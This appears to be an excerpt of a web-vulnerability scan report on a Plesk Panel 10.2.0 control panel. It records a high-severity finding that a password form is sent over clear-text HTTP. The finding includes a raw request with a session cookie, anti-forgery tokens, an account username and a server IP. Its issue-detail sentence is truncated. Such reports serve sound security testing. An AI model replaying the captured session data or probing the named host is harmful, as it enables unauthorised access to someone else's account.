<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/edit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/edit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/web/edit HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: advancedPanel-hidden=0; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:16:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:16:53 GMT
Connection: close
Content-Length: 26000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Web Hosting Settings - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fedit' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/web/index">
<span>Up Level</span>
</a>
</div>
<h2><span>Web Hosting Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<p>This is where you can view the IP addresses associated with your subscription and change the username and password for access to files and folders related to your subscription.</p>

<form id="form-nal-web-edit" enctype="application/x-www-form-urlencoded" action="" method="post">

<div id='ipAddress' class='form-box' >
<div id='ipAddress-content-area'>

<div class='form-row'>
<div class='field-name'><label for='ipAddress-currentIp'>IP Addresses&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='ipAddress-currentIp'>50.23.106.58</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'IP Addresses',
applyTo: 'ipAddress'
});
});
//]]>
</script>


<div id='userAccount' class='form-box' >
<div id='userAccount-content-area'>
<tr>
<td colspan='2'>
<p class="" escape="">System user account used for managing files and folders within the subscription.</p></td>
</tr>
<div id='userAccount-login-form-row' class='form-row' >
<div class='field-name'><label for='userAccount-login'>Username&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="userAccount[login]" id="userAccount-login" value="xsscx" autocomplete="off" maxlength="16" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='userAccount-password-form-row' class='form-row' >
<div class='field-name'><label for='userAccount-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="userAccount[password]" id="userAccount-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('userAccount-password');
new Jsw.PasswordMeter({
renderTo: 'userAccount-password',
renderMode: 'after',
observe: 'userAccount-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='userAccount-confirmPassword-form-row' class='form-row' >
<div class='field-name'><label for='userAccount-confirmPassword'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="userAccount[confirmPassword]" id="userAccount-confirmPassword" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='field-name'><label for='userAccount-shell'>Access to the server over Remote Desktop&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='userAccount-shell'>Login prohibited</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'User Account',
applyTo: 'userAccount'
});
});
//]]>
</script>


<div id='diskQuota' class='form-box' >
<div id='diskQuota-content-area'>
<tr>
<td colspan='2'>
<p class="" escape="">The hard quota on disk space is the limit on the amount of disk space that can be used. If the hard quota is set, and all allocated disk space is used, no further operations on files can be performed.</p></td>
</tr>

<div class='form-row'>
<div class='field-name'><label for='diskQuota-quota'>Hard quota on disk space&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='diskQuota-quota'>Unlimited</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Hard Quota on Disk Space',
applyTo: 'diskQuota'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/web"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-nal-web-edit',
waitButtonTitle: 'Please wait'
})
});
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

if ($('userAccount-restrictedShell')) {
var optionsElementsPrefix = 'userAccount-';
var optionsDefaults = { 'shell': $('userAccount-restrictedShell').value };
var optionsNames = Object.keys(optionsDefaults);
var insecureHostingOptionsElement = null;

var localeKeys = {"buttonConflictYes":"Yes","buttonConflictNo":"No","sureToApplyConflictOptionTitle":"Are you sure you want to apply this setting?","sureToApplyConflictOptionDescription":"This setting conflicts with the server-wide security policy.","foundConflictOptionsTitle":"There are settings that conflict with the server-wide security policy. Are you sure you want to continue?","foundConflictOptionsDescription":"If you really want to override the security policy and apply the conflicting settings, click Yes. Otherwise, click No, and then click the link 'apply secure setting preset' to bring the settings in accordance with the server-wide security policy. The following settings conflict with the policy:","option_ssl":"SSL support","option_php_safe_mode":"PHP 'safe_mode' on","option_perl":"Perl support","option_python":"Python support","option_miva":"Miva support","option_coldfusion":"Adobe ColdFusion support","option_write_modify":"Additional write\/modify permissions","option_php":"PHP support","option_cgi":"CGI support","option_fastcgi":"FastCGI support (required for Ruby on Rails)","option_ssi":"SSI support","option_asp_dot_net":"Microsoft ASP.NET support","option_asp":"Apache ASP support","option_errdocs":"Custom error documents","option_webstat":"Web statistics","option_shell":"System shell","option_php_handler":"PHP handler type","option_iis_app_pool":"Dedicated IIS application pool"};

function optionConflictWarning(element, defaultValue, resetHandler) {
Jsw.messageBox.show({
'type': Jsw.messageBox.TYPE_YESNO,
'subtype': 'confirm',
'text': localeKeys['sureToApplyConflictOptionTitle'],
'description': localeKeys['sureToApplyConflictOptionDescription'],
'onNoClick': function() {
if ('undefined' != typeof resetHandler) {
resetHandler();
} else {
if ('input' == element.tagName.toLowerCase() && 'checkbox' == element.type) {
// set inverted value and simulate the selection by click to fire event observers
element.checked = !defaultValue;
element.click();
